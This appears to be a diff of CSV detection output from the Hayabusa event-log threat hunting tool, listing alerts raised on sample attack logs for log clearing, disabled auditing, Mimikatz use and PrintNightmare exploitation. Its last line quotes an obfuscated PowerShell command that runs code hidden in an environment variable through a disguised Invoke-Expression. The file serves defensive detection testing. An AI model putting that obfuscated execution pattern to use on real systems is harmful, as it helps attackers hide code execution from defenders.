+2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: ""cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i'))  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: OFFSEC\admmig  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
